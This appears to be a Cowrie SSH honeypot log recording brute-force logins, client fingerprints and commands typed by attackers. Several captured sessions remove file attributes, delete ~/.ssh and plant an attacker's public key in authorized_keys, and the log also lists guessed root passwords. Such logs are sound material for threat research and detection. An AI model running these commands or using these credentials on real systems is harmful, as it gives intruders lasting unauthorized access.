{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":432,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:11:25.216828Z","src_ip":"212.227.125.160","session":"c5e932882092"}
{"eventid":"cowrie.session.closed","duration":180.18032884597778,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:11:25.220770Z","src_ip":"212.227.125.160","session":"c5e932882092"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:11:25.751151Z","src_ip":"212.227.235.229","session":"7abcfb25ad3e"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:11:25.751886Z","src_ip":"212.227.235.229","session":"7abcfb25ad3e"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:11:25.752840Z","src_ip":"212.227.235.229","session":"7abcfb25ad3e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:11:26.047504Z","src_ip":"212.227.235.229","session":"7abcfb25ad3e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:11:26.749056Z","src_ip":"212.227.235.229","session":"7abcfb25ad3e"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T22:11:26.749836Z","src_ip":"212.227.235.229","session":"7abcfb25ad3e"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T22:11:27.045370Z","src_ip":"212.227.235.229","session":"7abcfb25ad3e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:11:27.046373Z","src_ip":"212.227.235.229","session":"7abcfb25ad3e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45400,"dst_ip":"1.2.3.4","dst_port":22,"session":"fe6eeebf8565","protocol":"ssh","message":"New connection: 212.227.235.229:45400 (1.2.3.4:22) [session: fe6eeebf8565]","sensor":"my-vps","timestamp":"2025-09-08T22:11:27.336623Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:11:27.337610Z","src_ip":"212.227.235.229","session":"fe6eeebf8565"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:11:27.629950Z","src_ip":"212.227.235.229","session":"fe6eeebf8565"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49924,"dst_ip":"1.2.3.4","dst_port":22,"session":"d8856468bc71","protocol":"ssh","message":"New connection: 212.227.125.160:49924 (1.2.3.4:22) [session: d8856468bc71]","sensor":"my-vps","timestamp":"2025-09-08T22:11:28.259320Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-PUTTY","message":"Remote SSH version: SSH-2.0-PUTTY","sensor":"my-vps","timestamp":"2025-09-08T22:11:28.260186Z","src_ip":"212.227.125.160","session":"d8856468bc71"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-09-08T22:11:28.319139Z","src_ip":"212.227.125.160","session":"d8856468bc71"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:11:28.640620Z","src_ip":"212.227.125.160","session":"d8856468bc71"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T22:11:28.839732Z","src_ip":"212.227.235.229","session":"fe6eeebf8565"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:11:30.133119Z","src_ip":"212.227.235.229","session":"fe6eeebf8565"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45404,"dst_ip":"1.2.3.4","dst_port":22,"session":"6b9f9b33b812","protocol":"ssh","message":"New connection: 212.227.235.229:45404 (1.2.3.4:22) [session: 6b9f9b33b812]","sensor":"my-vps","timestamp":"2025-09-08T22:11:30.426944Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:11:30.428895Z","src_ip":"212.227.235.229","session":"6b9f9b33b812"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:11:30.720283Z","src_ip":"212.227.235.229","session":"6b9f9b33b812"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59218,"dst_ip":"1.2.3.4","dst_port":22,"session":"282baf9e73c3","protocol":"ssh","message":"New connection: 212.227.235.229:59218 (1.2.3.4:22) [session: 282baf9e73c3]","sensor":"my-vps","timestamp":"2025-09-08T22:11:30.979804Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:11:30.980762Z","src_ip":"212.227.235.229","session":"282baf9e73c3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:11:31.293402Z","src_ip":"212.227.235.229","session":"282baf9e73c3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60810,"dst_ip":"1.2.3.4","dst_port":22,"session":"2bb6de0c2171","protocol":"ssh","message":"New connection: 212.227.235.229:60810 (1.2.3.4:22) [session: 2bb6de0c2171]","sensor":"my-vps","timestamp":"2025-09-08T22:11:31.307030Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:11:31.308634Z","src_ip":"212.227.235.229","session":"2bb6de0c2171"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:11:31.562169Z","src_ip":"212.227.235.229","session":"2bb6de0c2171"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:11:31.889703Z","src_ip":"212.227.235.229","session":"6b9f9b33b812"}
{"eventid":"cowrie.session.closed","duration":"8.5","message":"Connection lost after 8.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:11:32.181161Z","src_ip":"212.227.235.229","session":"7abcfb25ad3e"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:11:32.183175Z","src_ip":"212.227.235.229","session":"6b9f9b33b812"}
{"eventid":"cowrie.login.failed","username":"andreas","password":"andreas","message":"login attempt [andreas/andreas] failed","sensor":"my-vps","timestamp":"2025-09-08T22:11:32.583021Z","src_ip":"212.227.235.229","session":"282baf9e73c3"}
{"eventid":"cowrie.login.success","username":"root","password":"!@#$%rdp","message":"login attempt [root/!@#$%rdp] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:11:32.600775Z","src_ip":"212.227.235.229","session":"2bb6de0c2171"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:11:33.738415Z","src_ip":"212.227.235.229","session":"2bb6de0c2171"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:11:33.739300Z","src_ip":"212.227.235.229","session":"2bb6de0c2171"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:11:33.740160Z","src_ip":"212.227.235.229","session":"2bb6de0c2171"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:11:33.897612Z","src_ip":"212.227.235.229","session":"282baf9e73c3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:11:33.990801Z","src_ip":"212.227.235.229","session":"2bb6de0c2171"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:11:34.510562Z","src_ip":"212.227.235.229","session":"2bb6de0c2171"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T22:11:34.511328Z","src_ip":"212.227.235.229","session":"2bb6de0c2171"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46024,"dst_ip":"1.2.3.4","dst_port":22,"session":"e4a99eeb8b38","protocol":"ssh","message":"New connection: 212.227.235.229:46024 (1.2.3.4:22) [session: e4a99eeb8b38]","sensor":"my-vps","timestamp":"2025-09-08T22:11:35.237493Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:11:35.242437Z","src_ip":"212.227.235.229","session":"e4a99eeb8b38"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:11:35.491710Z","src_ip":"212.227.235.229","session":"e4a99eeb8b38"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46710,"dst_ip":"1.2.3.4","dst_port":22,"session":"736051cdaac0","protocol":"ssh","message":"New connection: 212.227.235.229:46710 (1.2.3.4:22) [session: 736051cdaac0]","sensor":"my-vps","timestamp":"2025-09-08T22:11:36.034430Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:11:36.038344Z","src_ip":"212.227.235.229","session":"736051cdaac0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:11:36.286000Z","src_ip":"212.227.235.229","session":"736051cdaac0"}
{"eventid":"cowrie.login.failed","username":"sgp","password":"sgp@123","message":"login attempt [sgp/sgp@123] failed","sensor":"my-vps","timestamp":"2025-09-08T22:11:36.486505Z","src_ip":"212.227.235.229","session":"e4a99eeb8b38"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T22:11:36.939543Z","src_ip":"212.227.235.229","session":"2bb6de0c2171"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"2.4","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 2.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:11:36.940476Z","src_ip":"212.227.235.229","session":"2bb6de0c2171"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T22:11:37.284117Z","src_ip":"212.227.235.229","session":"736051cdaac0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50476,"dst_ip":"1.2.3.4","dst_port":22,"session":"54ef902f720d","protocol":"ssh","message":"New connection: 212.227.235.229:50476 (1.2.3.4:22) [session: 54ef902f720d]","sensor":"my-vps","timestamp":"2025-09-08T22:11:38.276086Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:11:38.276931Z","src_ip":"212.227.235.229","session":"54ef902f720d"}
